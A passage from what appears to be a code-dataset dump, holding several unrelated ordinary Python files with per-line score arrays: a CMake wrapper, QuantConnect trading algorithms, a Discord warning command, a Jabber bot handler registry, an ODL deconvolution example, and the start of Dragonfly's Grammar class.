0.03225806451612903, 0.02127659574468085, 0.07692307692307693, 0.037037037037037035, 0.043478260869565216, 0.0392156862745098, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0.038461538461538464, 0, 0, 0, 0, 0, 0.038461538461538464, 0, 0.03571428571428571, 0, 0.045454545454545456, 0, 0.045454545454545456, 0, 0.041666666666666664, 0, 0, 0, 0, 0.023255813953488372 ]
1,596
0.021424
false
""" Class for accessing the cmake process """ import shutil, subprocess, os from pylib.logwrapper import LogWrapper from pylib.process import Process # Wrapper class for logging class CMakeProcess(Process): def __init__(self): super().__init__() self.log = LogWrapper.getlogger() self.ExePath = "cmake.exe" # CMake Process options self.Generator = None self.AdditionalOptions = None self.SrcDir = None def SetupOutputDir(self): # Setup Output directory if os.path.exists(self.WorkingDir): self.log.warn("Cleaning Output Directory: " + self.WorkingDir) shutil.rmtree(self.WorkingDir, ignore_errors=True) os.makedirs(self.WorkingDir) return def Start(self): self.log.info("Starting generation of cmake files") if self.Options == None: self.Options = [] self.Options = self.Options + self.GenerateCmdLineOpts() self.log.info("CMake: Launching:") self.log.info("CMake: Command: " + " ".join(str(x) for x in self.Options)) super().Start() return # Generate Command Line Options def GenerateCmdLineOpts(self): ret = [] if self.Generator != None: ret.append("-G" + self.Generator) if self.AdditionalOptions != None: ret = ret + self.AdditionalOptions if self.SrcDir != None: ret.append(self.SrcDir) return ret
[ "\"\"\"\n", "Class for accessing the cmake process\n", "\"\"\"\n", "\n", "import shutil, subprocess, os\n", "from pylib.logwrapper import LogWrapper\n", "from pylib.process import Process\n", "\n", "# Wrapper class for logging\n", "class CMakeProcess(Process):\n", "\n", " def __init__(self):\n", " super().__init__()\n", " self.log = LogWrapper.getlogger()\n", " self.ExePath = \"cmake.exe\"\n", "\n", " # CMake Process options\n", " self.Generator = None\n", " self.AdditionalOptions = None\n", " self.SrcDir = None\n", "\n", " def SetupOutputDir(self):\n", " # Setup Output directory\n", " if os.path.exists(self.WorkingDir):\n", " self.log.warn(\"Cleaning Output Directory: \" + self.WorkingDir)\n", " shutil.rmtree(self.WorkingDir, ignore_errors=True)\n", " os.makedirs(self.WorkingDir)\n", " return\n", "\n", " def Start(self):\n", " self.log.info(\"Starting generation of cmake files\")\n", "\n", " if self.Options == None: self.Options = []\n", " self.Options = self.Options + self.GenerateCmdLineOpts()\n", "\n", " self.log.info(\"CMake: Launching:\")\n", " self.log.info(\"CMake: Command: \" + \" \".join(str(x) for x in self.Options))\n", "\n", " super().Start()\n", " return\n", "\n", " # Generate Command Line Options\n", " def GenerateCmdLineOpts(self):\n", " ret = []\n", " if self.Generator != None: ret.append(\"-G\" + self.Generator)\n", " if self.AdditionalOptions != None: ret = ret + self.AdditionalOptions\n", " if self.SrcDir != None: ret.append(self.SrcDir)\n", " return ret\n" ]
[ 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0.034482758620689655, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0392156862745098, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0.028985507246376812, 0.02564102564102564, 0.03571428571428571, 0 ]
48
0.004363
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System") AddReference("QuantConnect.Algorithm") AddReference("QuantConnect.Algorithm.Framework") AddReference("QuantConnect.Common") from System import * from QuantConnect import * from QuantConnect.Orders import * from QuantConnect.Algorithm import * from QuantConnect.Algorithm.Framework import * from QuantConnect.Algorithm.Framework.Alphas import * from QuantConnect.Algorithm.Framework.Execution import * from QuantConnect.Algorithm.Framework.Portfolio import * from QuantConnect.Algorithm.Framework.Risk import * from QuantConnect.Algorithm.Framework.Selection import * from datetime import timedelta import numpy as np ### <summary> ### Basic template framework algorithm uses framework components to define the algorithm. ### </summary> ### <meta name="tag" content="using data" /> ### <meta name="tag" content="using quantconnect" /> ### <meta name="tag" content="trading and orders" /> class BasicTemplateFrameworkAlgorithm(QCAlgorithm): '''Basic template framework algorithm uses framework components to define the algorithm.''' def Initialize(self): ''' Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.''' # Set requested data resolution self.UniverseSettings.Resolution = Resolution.Minute self.SetStartDate(2013,10,7) #Set Start Date self.SetEndDate(2013,10,11) #Set End Date self.SetCash(100000) #Set Strategy Cash # Find more symbols here: http://quantconnect.com/data # Forex, CFD, Equities Resolutions: Tick, Second, Minute, Hour, Daily. # Futures Resolution: Tick, Second, Minute # Options Resolution: Minute Only. symbols = [ Symbol.Create("SPY", SecurityType.Equity, Market.USA) ] # set algorithm framework models self.SetUniverseSelection(ManualUniverseSelectionModel(symbols)) self.SetAlpha(ConstantAlphaModel(InsightType.Price, InsightDirection.Up, timedelta(minutes = 20), 0.025, None)) self.SetPortfolioConstruction(EqualWeightingPortfolioConstructionModel()) self.SetExecution(ImmediateExecutionModel()) self.SetRiskManagement(MaximumDrawdownPercentPerSecurity(0.01)) self.Debug("numpy test >>> print numpy.pi: " + str(np.pi)) def OnOrderEvent(self, orderEvent): if orderEvent.Status == OrderStatus.Filled: self.Debug("Purchased Stock: {0}".format(orderEvent.Symbol))
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "AddReference(\"QuantConnect.Algorithm.Framework\")\n", "AddReference(\"QuantConnect.Common\")\n", "\n", "from System import *\n", "from QuantConnect import *\n", "from QuantConnect.Orders import *\n", "from QuantConnect.Algorithm import *\n", "from QuantConnect.Algorithm.Framework import *\n", "from QuantConnect.Algorithm.Framework.Alphas import *\n", "from QuantConnect.Algorithm.Framework.Execution import *\n", "from QuantConnect.Algorithm.Framework.Portfolio import *\n", "from QuantConnect.Algorithm.Framework.Risk import *\n", "from QuantConnect.Algorithm.Framework.Selection import *\n", "from datetime import timedelta\n", "import numpy as np\n", "\n", "### <summary>\n", "### Basic template framework algorithm uses framework components to define the algorithm.\n", "### </summary>\n", "### <meta name=\"tag\" content=\"using data\" />\n", "### <meta name=\"tag\" content=\"using quantconnect\" />\n", "### <meta name=\"tag\" content=\"trading and orders\" />\n", "class BasicTemplateFrameworkAlgorithm(QCAlgorithm):\n", " '''Basic template framework algorithm uses framework components to define the algorithm.'''\n", "\n", " def Initialize(self):\n", " ''' Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''\n", "\n", " # Set requested data resolution\n", " self.UniverseSettings.Resolution = Resolution.Minute\n", "\n", " self.SetStartDate(2013,10,7) #Set Start Date\n", " self.SetEndDate(2013,10,11) #Set End Date\n", " self.SetCash(100000) #Set Strategy Cash\n", "\n", " # Find more symbols here: http://quantconnect.com/data\n", " # Forex, CFD, Equities Resolutions: Tick, Second, Minute, Hour, Daily.\n", " # Futures Resolution: Tick, Second, Minute\n", " # Options Resolution: Minute Only.\n", " symbols = [ Symbol.Create(\"SPY\", SecurityType.Equity, Market.USA) ]\n", "\n", " # set algorithm framework models\n", " self.SetUniverseSelection(ManualUniverseSelectionModel(symbols))\n", " self.SetAlpha(ConstantAlphaModel(InsightType.Price, InsightDirection.Up, timedelta(minutes = 20), 0.025, None))\n", " self.SetPortfolioConstruction(EqualWeightingPortfolioConstructionModel())\n", " self.SetExecution(ImmediateExecutionModel())\n", " self.SetRiskManagement(MaximumDrawdownPercentPerSecurity(0.01))\n", "\n", " self.Debug(\"numpy test >>> print numpy.pi: \" + str(np.pi))\n", "\n", " def OnOrderEvent(self, orderEvent):\n", " if orderEvent.Status == OrderStatus.Filled:\n", " self.Debug(\"Purchased Stock: {0}\".format(orderEvent.Symbol))\n" ]
[ 0, 0.012345679012345678, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.037037037037037035, 0.029411764705882353, 0.02702702702702703, 0.02127659574468085, 0.018518518518518517, 0.017543859649122806, 0.017543859649122806, 0.019230769230769232, 0.017543859649122806, 0.03225806451612903, 0.05263157894736842, 0, 0.07142857142857142, 0.022222222222222223, 0.06666666666666667, 0.022222222222222223, 0.018867924528301886, 0.018867924528301886, 0.019230769230769232, 0.010416666666666666, 0, 0, 0.006535947712418301, 0, 0, 0, 0, 0.05454545454545454, 0.05660377358490566, 0.017241379310344827, 0, 0, 0, 0, 0, 0.02631578947368421, 0, 0, 0, 0.025, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0 ]
69
0.011741
false
import discord from sigma.core.permission import check_man_msg async def warns(cmd, message, args): try: warned_users = cmd.db.get_settings(message.guild.id, 'WarnedUsers') except KeyError: cmd.db.set_settings(message.guild.id, 'WarnedUsers', {}) warned_users = {} if not check_man_msg(message.author, message.channel): target = message.author target_id = str(target.id) if target_id not in warned_users: embed = discord.Embed(color=0x0099FF, title='ℹ You Were Never Warned') else: embed = discord.Embed(color=0x0099FF) embed.add_field(name='ℹ You Were Warned For...', value='```\n- ' + '\n- '.join(warned_users[target_id]['Reasons']) + '\n```') await message.channel.send(None, embed=embed) return if not message.mentions: if len(warned_users) == 0: embed = discord.Embed(color=0x0099FF, title='ℹ There Are No Warned Users') else: warn_user_list = [] for key in warned_users: for member in message.guild.members: if member.id == warned_users[key]['UserID']: warn_user_list.append(f'{member.name}#{member.discriminator}') embed = discord.Embed(color=0x0099FF) embed.add_field(name='ℹ List of Warned Users', value='```\n' + ', '.join(warn_user_list) + '\n```') else: target = message.mentions[0] target_id = str(target.id) if target_id not in warned_users: embed = discord.Embed(color=0x0099FF, title='ℹ ' + target.name + ' Was Never Warned') else: embed = discord.Embed(color=0x0099FF) embed.add_field(name='ℹ ' + target.name + ' Was Warned For...', value='```\n- ' + '\n- '.join(warned_users[target_id]['Reasons']) + '\n```') await message.channel.send(None, embed=embed)
[ "import discord\n", "from sigma.core.permission import check_man_msg\n", "\n", "\n", "async def warns(cmd, message, args):\n", " try:\n", " warned_users = cmd.db.get_settings(message.guild.id, 'WarnedUsers')\n", " except KeyError:\n", " cmd.db.set_settings(message.guild.id, 'WarnedUsers', {})\n", " warned_users = {}\n", " if not check_man_msg(message.author, message.channel):\n", " target = message.author\n", " target_id = str(target.id)\n", " if target_id not in warned_users:\n", " embed = discord.Embed(color=0x0099FF, title='ℹ You Were Never Warned')\n", " else:\n", " embed = discord.Embed(color=0x0099FF)\n", " embed.add_field(name='ℹ You Were Warned For...',\n", " value='```\\n- ' + '\\n- '.join(warned_users[target_id]['Reasons']) + '\\n```')\n", " await message.channel.send(None, embed=embed)\n", " return\n", " if not message.mentions:\n", " if len(warned_users) == 0:\n", " embed = discord.Embed(color=0x0099FF, title='ℹ There Are No Warned Users')\n", " else:\n", " warn_user_list = []\n", " for key in warned_users:\n", " for member in message.guild.members:\n", " if member.id == warned_users[key]['UserID']:\n", " warn_user_list.append(f'{member.name}#{member.discriminator}')\n", " embed = discord.Embed(color=0x0099FF)\n", " embed.add_field(name='ℹ List of Warned Users', value='```\\n' + ', '.join(warn_user_list) + '\\n```')\n", " else:\n", " target = message.mentions[0]\n", " target_id = str(target.id)\n", " if target_id not in warned_users:\n", " embed = discord.Embed(color=0x0099FF, title='ℹ ' + target.name + ' Was Never Warned')\n", " else:\n", " embed = discord.Embed(color=0x0099FF)\n", " embed.add_field(name='ℹ ' + target.name + ' Was Warned For...',\n", " value='```\\n- ' + '\\n- '.join(warned_users[target_id]['Reasons']) + '\\n```')\n", " await message.channel.send(None, embed=embed)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0.009523809523809525, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0.011494252873563218, 0, 0.008928571428571428, 0, 0, 0, 0, 0.01020408163265306, 0, 0, 0, 0.009523809523809525, 0 ]
42
0.001743
false
# -*- coding: utf-8 -*- ################################################################################ COMMANDS = {} COMMAND_HANDLERS = {} MESSAGE_HANDLERS = [] PRESENCE_HANDLERS = [] IQ_HANDLERS = [] JOIN_HANDLERS = [] LEAVE_HANDLERS = [] ### HANDLERS REGISTERING ####################################################### def register_message_handler(instance): MESSAGE_HANDLERS.append(instance) def register_presence_handler(instance): PRESENCE_HANDLERS.append(instance) def register_iq_handler(instance): IQ_HANDLERS.append(instance) def register_join_handler(instance): JOIN_HANDLERS.append(instance) def register_leave_handler(instance): LEAVE_HANDLERS.append(instance) def register_command_handler(instance, cmd, ctg=[], dsc='', syn='', acs=1, pub=None): # (handler, команда, категории, описание, синтаксис, доступ, флаг "используется в ростере") log(u'\t' + cmd) COMMAND_HANDLERS[cmd] = instance COMMANDS[cmd] = {'ctg': ctg, 'dsc': dsc, 'syn': syn, 'acs': acs, 'pub': pub} ### HANDLERS CALLING ########################################################### def call_message_handlers(t, s, b): for handler in MESSAGE_HANDLERS: with instance_control: threading.Thread(None, handler, 'msg_' + str(random.randrange(0,999)), (t, s, b,)).start() def call_presence_handlers(prs): for handler in PRESENCE_HANDLERS: with instance_control: threading.Thread(None, handler, 'prs_' + str(random.randrange(0,999)), (prs,)).start() def call_iq_handlers(iq): print 'call_iq' for handler in IQ_HANDLERS: with instance_control: threading.Thread(None, handler, 'iq_' + str(random.randrange(0,999)), (iq,)).start() def call_join_handlers(jid, muc, nick, afl, role): print 'call_join' for handler in JOIN_HANDLERS: with instance_control: threading.Thread(None, handler, 'join_' + str(random.randrange(0,999)), (jid, muc, nick, afl, role,)).start() def call_leave_handlers(jid, muc, nick, afl, role): log('call_leave') for handler in LEAVE_HANDLERS: with instance_control: threading.Thread(None, handler, 'leave_' + str(random.randrange(0,999)), (jid, muc, nick, afl, role,)).start() def call_command_handlers(cmd, t, s, p): muc = s[1] if is_muc(muc): if cmd in (load_option(muc, 'disabled') or []): # если команда находится в отключенных with instance_control: threading.Thread(None, reply, 'cmd_' + str(random.randrange(0,999)), (t, s, core_cmd_disabled_msg % cmd,)).start() return else: if not COMMANDS[cmd]['pub']: # если команда только для конференций with instance_control: threading.Thread(None, reply, 'cmd_' + str(random.randrange(0,999)), (t, s, core_muc_only_msg,)).start() return with instance_control: threading.Thread(None, COMMAND_HANDLERS[cmd], 'cmd_' + str(random.randrange(0,999)), (t, s, p,)).start()
[ "# -*- coding: utf-8 -*-\r\n", "\r\n", "################################################################################\r\n", "\r\n", "COMMANDS = {}\r\n", "\r\n", "COMMAND_HANDLERS = {}\r\n", "MESSAGE_HANDLERS = []\r\n", "PRESENCE_HANDLERS = []\r\n", "IQ_HANDLERS = []\r\n", "JOIN_HANDLERS = []\r\n", "LEAVE_HANDLERS = []\r\n", "\r\n", "### HANDLERS REGISTERING #######################################################\r\n", "\r\n", "def register_message_handler(instance):\r\n", " MESSAGE_HANDLERS.append(instance)\r\n", "\r\n", "\r\n", "\r\n", "def register_presence_handler(instance):\r\n", " PRESENCE_HANDLERS.append(instance)\r\n", "\r\n", "\r\n", "\r\n", "def register_iq_handler(instance):\r\n", " IQ_HANDLERS.append(instance)\r\n", "\r\n", "\r\n", "\r\n", "def register_join_handler(instance):\r\n", " JOIN_HANDLERS.append(instance)\r\n", "\r\n", "\r\n", "\r\n", "def register_leave_handler(instance):\r\n", " LEAVE_HANDLERS.append(instance)\r\n", "\r\n", "\r\n", "\r\n", "def register_command_handler(instance, cmd, ctg=[], dsc='', syn='', acs=1, pub=None):\r\n", "# (handler, команда, категории, описание, синтаксис, доступ, флаг \"используется в ростере\")\r\n", " log(u'\\t' + cmd)\r\n", " COMMAND_HANDLERS[cmd] = instance\r\n", " COMMANDS[cmd] = {'ctg': ctg, 'dsc': dsc, 'syn': syn, 'acs': acs, 'pub': pub}\r\n", "\r\n", "### HANDLERS CALLING ###########################################################\r\n", "\r\n", "def call_message_handlers(t, s, b):\r\n", " for handler in MESSAGE_HANDLERS:\r\n", " with instance_control:\r\n", " threading.Thread(None, handler, 'msg_' + str(random.randrange(0,999)), (t, s, b,)).start()\r\n", "\r\n", "\r\n", "\r\n", "def call_presence_handlers(prs):\r\n", " for handler in PRESENCE_HANDLERS:\r\n", " with instance_control:\r\n", " threading.Thread(None, handler, 'prs_' + str(random.randrange(0,999)), (prs,)).start()\r\n", "\r\n", "\r\n", "\r\n", "def call_iq_handlers(iq):\r\n", " print 'call_iq'\r\n", " for handler in IQ_HANDLERS:\r\n", " with instance_control:\r\n", " threading.Thread(None, handler, 'iq_' + str(random.randrange(0,999)), (iq,)).start()\r\n", "\r\n", "\r\n", "\r\n", "def call_join_handlers(jid, muc, nick, afl, role):\r\n", " print 'call_join'\r\n", " for handler in JOIN_HANDLERS:\r\n", " with instance_control:\r\n", " threading.Thread(None, handler, 'join_' + str(random.randrange(0,999)), (jid, muc, nick, afl, role,)).start()\r\n", "\r\n", "\r\n", "\r\n", "def call_leave_handlers(jid, muc, nick, afl, role):\r\n", " log('call_leave')\r\n", " for handler in LEAVE_HANDLERS:\r\n", " with instance_control:\r\n", " threading.Thread(None, handler, 'leave_' + str(random.randrange(0,999)), (jid, muc, nick, afl, role,)).start()\r\n", "\r\n", "\r\n", "\r\n", "def call_command_handlers(cmd, t, s, p):\r\n", " muc = s[1]\r\n", "\r\n", " if is_muc(muc):\r\n", " if cmd in (load_option(muc, 'disabled') or []):\t\t# если команда находится в отключенных\r\n", " with instance_control:\r\n", " threading.Thread(None, reply, 'cmd_' + str(random.randrange(0,999)), (t, s, core_cmd_disabled_msg % cmd,)).start()\r\n", " return\r\n", "\r\n", " else:\r\n", " if not COMMANDS[cmd]['pub']:\t\t\t# если команда только для конференций\r\n", " with instance_control:\r\n", " threading.Thread(None, reply, 'cmd_' + str(random.randrange(0,999)), (t, s, core_muc_only_msg,)).start()\r\n", " return\r\n", "\r\n", " with instance_control:\r\n", " threading.Thread(None, COMMAND_HANDLERS[cmd], 'cmd_' + str(random.randrange(0,999)), (t, s, p,)).start()\r\n" ]
[ 0, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0, 0.024390243902439025, 0.027777777777777776, 0, 0, 0, 0.023809523809523808, 0.02702702702702703, 0, 0, 0, 0.027777777777777776, 0.03225806451612903, 0, 0, 0, 0.02631578947368421, 0.030303030303030304, 0, 0, 0, 0.02564102564102564, 0.029411764705882353, 0, 0, 0, 0.022988505747126436, 0.021505376344086023, 0.05263157894736842, 0.02857142857142857, 0.012658227848101266, 0, 0.024390243902439025, 0, 0.02702702702702703, 0.02857142857142857, 0.038461538461538464, 0.031578947368421054, 0, 0, 0, 0.029411764705882353, 0.027777777777777776, 0.038461538461538464, 0.03296703296703297, 0, 0, 0, 0.037037037037037035, 0.05555555555555555, 0.03333333333333333, 0.038461538461538464, 0.033707865168539325, 0, 0, 0, 0.019230769230769232, 0.05, 0.03125, 0.038461538461538464, 0.02631578947368421, 0, 0, 0, 0.018867924528301886, 0.05, 0.030303030303030304, 0.038461538461538464, 0.02608695652173913, 0, 0, 0, 0.023809523809523808, 0.07692307692307693, 0, 0.05555555555555555, 0.02197802197802198, 0.037037037037037035, 0.016666666666666666, 0, 0, 0.125, 0.013888888888888888, 0.037037037037037035, 0.01818181818181818, 0, 0, 0.04, 0.027777777777777776 ]
103
0.016983
false
"""Example of a deconvolution problem with different solvers (CPU).""" import numpy as np import matplotlib.pyplot as plt from scipy import ndimage import odl class Convolution(odl.Operator): def __init__(self, kernel, adjkernel=None): self.kernel = kernel self.adjkernel = (adjkernel if adjkernel is not None else kernel.space.element(kernel[::-1].copy())) self.norm = float(np.sum(np.abs(self.kernel.ntuple))) odl.Operator.__init__(self, domain=kernel.space, range=kernel.space, linear=True) def _call(self, rhs, out): ndimage.convolve(rhs.ntuple.data, self.kernel.ntuple.data, output=out.ntuple.data, mode='wrap') @property def adjoint(self): return Convolution(self.adjkernel, self.kernel) def opnorm(self): return self.norm # Discretization discr_space = odl.uniform_discr(0, 10, 500, impl='numpy') # Complicated functions to check performance kernel = discr_space.element(lambda x: np.exp(x / 2) * np.cos(x * 1.172)) phantom = discr_space.element(lambda x: x ** 2 * np.sin(x) ** 2 * (x > 5)) # Create operator conv = Convolution(kernel) # Dampening parameter for landweber iterations = 100 omega = 1 / conv.opnorm() ** 2 # Display callback def callback(x): plt.plot(conv(x)) # Test CGN plt.figure() plt.plot(phantom) odl.solvers.conjugate_gradient_normal(conv, discr_space.zero(), phantom, iterations, callback) # Landweber plt.figure() plt.plot(phantom) odl.solvers.landweber(conv, discr_space.zero(), phantom, iterations, omega, callback) plt.show()
[ "\"\"\"Example of a deconvolution problem with different solvers (CPU).\"\"\"\n", "\n", "import numpy as np\n", "import matplotlib.pyplot as plt\n", "from scipy import ndimage\n", "import odl\n", "\n", "\n", "class Convolution(odl.Operator):\n", " def __init__(self, kernel, adjkernel=None):\n", " self.kernel = kernel\n", " self.adjkernel = (adjkernel if adjkernel is not None\n", " else kernel.space.element(kernel[::-1].copy()))\n", " self.norm = float(np.sum(np.abs(self.kernel.ntuple)))\n", " odl.Operator.__init__(self, domain=kernel.space, range=kernel.space,\n", " linear=True)\n", "\n", " def _call(self, rhs, out):\n", " ndimage.convolve(rhs.ntuple.data, self.kernel.ntuple.data,\n", " output=out.ntuple.data, mode='wrap')\n", "\n", " @property\n", " def adjoint(self):\n", " return Convolution(self.adjkernel, self.kernel)\n", "\n", " def opnorm(self):\n", " return self.norm\n", "\n", "# Discretization\n", "discr_space = odl.uniform_discr(0, 10, 500, impl='numpy')\n", "\n", "# Complicated functions to check performance\n", "kernel = discr_space.element(lambda x: np.exp(x / 2) * np.cos(x * 1.172))\n", "phantom = discr_space.element(lambda x: x ** 2 * np.sin(x) ** 2 * (x > 5))\n", "\n", "# Create operator\n", "conv = Convolution(kernel)\n", "\n", "# Dampening parameter for landweber\n", "iterations = 100\n", "omega = 1 / conv.opnorm() ** 2\n", "\n", "\n", "# Display callback\n", "def callback(x):\n", " plt.plot(conv(x))\n", "\n", "# Test CGN\n", "plt.figure()\n", "plt.plot(phantom)\n", "odl.solvers.conjugate_gradient_normal(conv, discr_space.zero(), phantom,\n", " iterations, callback)\n", "\n", "# Landweber\n", "plt.figure()\n", "plt.plot(phantom)\n", "odl.solvers.landweber(conv, discr_space.zero(), phantom,\n", " iterations, omega, callback)\n", "\n", "plt.show()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.017241379310344827, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
60
0.001569
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System") AddReference("QuantConnect.Algorithm") AddReference("QuantConnect.Indicators") AddReference("QuantConnect.Common") from System import * from QuantConnect import * from QuantConnect.Data import * from QuantConnect.Algorithm import * from QuantConnect.Indicators import * class HistoryRequestBenchmark(QCAlgorithm): def Initialize(self): self.SetStartDate(2010, 1, 1) self.SetEndDate(2018, 1, 1) self.SetCash(10000) self.symbol = self.AddEquity("SPY").Symbol def OnEndOfDay(self): minuteHistory = self.History([self.symbol], 60, Resolution.Minute) lastHourHigh = 0 for index, row in minuteHistory.loc["SPY"].iterrows(): if lastHourHigh < row["high"]: lastHourHigh = row["high"] dailyHistory = self.History([self.symbol], 1, Resolution.Daily).loc["SPY"].head() dailyHistoryHigh = dailyHistory["high"] dailyHistoryLow = dailyHistory["low"] dailyHistoryOpen = dailyHistory["open"]
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "AddReference(\"QuantConnect.Indicators\")\n", "AddReference(\"QuantConnect.Common\")\n", "\n", "from System import *\n", "from QuantConnect import *\n", "from QuantConnect.Data import *\n", "from QuantConnect.Algorithm import *\n", "from QuantConnect.Indicators import *\n", "\n", "class HistoryRequestBenchmark(QCAlgorithm):\n", "\n", " def Initialize(self):\n", " self.SetStartDate(2010, 1, 1)\n", " self.SetEndDate(2018, 1, 1)\n", " self.SetCash(10000)\n", " self.symbol = self.AddEquity(\"SPY\").Symbol\n", "\n", " def OnEndOfDay(self):\n", " minuteHistory = self.History([self.symbol], 60, Resolution.Minute)\n", " lastHourHigh = 0\n", " for index, row in minuteHistory.loc[\"SPY\"].iterrows():\n", " if lastHourHigh < row[\"high\"]:\n", " lastHourHigh = row[\"high\"]\n", "\n", " dailyHistory = self.History([self.symbol], 1, Resolution.Daily).loc[\"SPY\"].head()\n", " dailyHistoryHigh = dailyHistory[\"high\"]\n", " dailyHistoryLow = dailyHistory[\"low\"]\n", " dailyHistoryOpen = dailyHistory[\"open\"]" ]
[ 0, 0.012345679012345678, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.037037037037037035, 0.03125, 0.02702702702702703, 0.02631578947368421, 0, 0.022727272727272728, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0, 0, 0.02127659574468085 ]
44
0.005647
false
# # This file is part of Dragonfly. # (c) Copyright 2007, 2008 by Christo Butcher # Licensed under the LGPL. # # Dragonfly is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Dragonfly is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with Dragonfly. If not, see # <http://www.gnu.org/licenses/>. # """ Grammar class ============================================================================ """ import logging from six import string_types from ..engines import get_engine from .rule_base import Rule from .list import ListBase from .context import Context from ..error import GrammarError # -------------------------------------------------------------------------- class Grammar(object): """ Grammar class for managing a set of rules. This base grammar class takes care of the communication between Dragonfly's object model and the backend speech recognition engine. This includes compiling rules and elements, loading them, activating and deactivating them, and unloading them. It may, depending on the engine, also include receiving recognition results and dispatching them to the appropriate rule. - *name* -- name of this grammar - *description* (str, default: None) -- description for this grammar - *context* (Context, default: None) -- context within which to be active. If *None*, the grammar will always be active. """ # pylint: disable=too-many-instance-attributes _log_load = logging.getLogger("grammar.load") _log_begin = logging.getLogger("grammar.begin") _log_results = logging.getLogger("grammar.results") _log = logging.getLogger("grammar") # ---------------------------------------------------------------------- # Methods for initialization and cleanup. def __init__(self, name, description=None, context=None, engine=None): self._name = name self._description = description if not (isinstance(context, Context) or context is None): raise TypeError("context must be either a Context object or " "None") self._context = context if engine: self._engine = engine else: self._engine = get_engine() self._rules = [] self._lists = [] self._rule_names = None self._loaded = False self._enabled = True self._in_context = False def __del__(self): try: if self._loaded: return self.unload() except Exception as e: try: self._log.exception("Exception during grammar unloading:" " %s", e) except Exception as e: pass # ---------------------------------------------------------------------- # Methods for runtime introspection. def __repr__(self): return "%s(%s)" % (self.__class__.__name__, self._name) name = property(lambda self: self._name, doc="A grammar's name.") rules = property(lambda self: tuple(self._rules), doc="List of a grammar's rules.") active_rules = property( lambda self: [r for r in self.rules if r.active], doc="List of a grammar's active rules." ) lists = property(lambda self: tuple(self._lists), doc="List of a grammar's lists.") loaded = property(lambda self: self._loaded, doc="Whether a grammar is loaded into" " its SR engine or not.") @property def rule_names(self): """ List of grammar's rule names. """ result = [] for rule in self._rules: result.append(rule.name) return result def enable(self): """ Enable this grammar so that it is active to receive recognitions. """ 